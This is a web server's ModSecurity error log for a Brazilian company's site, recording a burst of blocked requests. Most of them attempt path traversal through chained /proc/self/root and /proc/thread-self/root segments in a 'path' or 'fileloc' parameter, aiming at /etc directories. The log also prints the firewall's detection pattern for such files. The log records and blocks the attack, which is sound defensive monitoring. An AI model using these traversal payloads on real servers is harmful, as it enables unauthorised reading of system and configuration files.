[Mon Mar 16 17:56:36.270367 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.243.203:39782] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuhLABkC4fWIHEf8ERmAAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:56:42.729859 2026] [:error] [pid 14895:tid 140411699963648] [client 74.7.241.46:48772] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuilajLEzk2WiQ-10twgAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:56:50.823917 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.228.16:45096] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhukv9ocpUE4ed4uDwOrwAAAhA"]
[Mon Mar 16 17:57:03.832277 2026] [:error] [pid 29802:tid 140411632822016] [client 74.7.241.46:44804] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhun8_BxrYCr4hPDw8FzgAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:57:20.480160 2026] [:error] [pid 14895:tid 140411741927168] [client 74.7.241.46:52014] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhusFajLEzk2WiQ-10t0QAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:57:36.710977 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.241.46:49430] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuwLABkC4fWIHEf8ERtAAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:57:37.991608 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.241.46:54402] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuwdSswJuvopo3lOh7DAAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:57:39.151306 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.241.46:49424] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuw7ABkC4fWIHEf8ERtgAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:57:43.484502 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.241.46:49430] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhux7ABkC4fWIHEf8ERuQAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:57:43.817378 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.243.203:43960] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhux46lpbStxTqkSkuEgwAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:57:47.390764 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.241.46:49442] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuy46lpbStxTqkSkuEhQAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:57:48.702423 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.241.46:59316] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuzKQpVkWug9HeOt9O8QAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:57:51.860224 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.241.46:59324] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuz6TCbgAP5jq5TehGeQAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:57:55.295818 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.241.46:59338] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu046lpbStxTqkSkuEiAAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:57:58.603281 2026] [:error] [pid 15061:tid 140411674785536] [client 74.7.241.46:59348] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu1qTCbgAP5jq5TehGfQAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:02.028598 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.241.46:45894] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu2rABkC4fWIHEf8ERzAAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:03.419272 2026] [:error] [pid 29507:tid 140411557287680] [client 74.7.241.46:45900] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu20r9dMAiw-8KANNj4gAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:04.504909 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.241.46:45914] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu3KTCbgAP5jq5TehGfgAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:05.778676 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.243.203:56934] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu3bABkC4fWIHEf8ER0AAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:58:05.867455 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.241.46:45918] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu3f9ocpUE4ed4uDwOuAAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:07.058845 2026] [:error] [pid 15061:tid 140411590858496] [client 74.7.241.46:45934] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu36TCbgAP5jq5TehGfwAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:08.247566 2026] [:error] [pid 29802:tid 140411658000128] [client 74.7.241.46:47908] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu4M_BxrYCr4hPDw8F0wAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
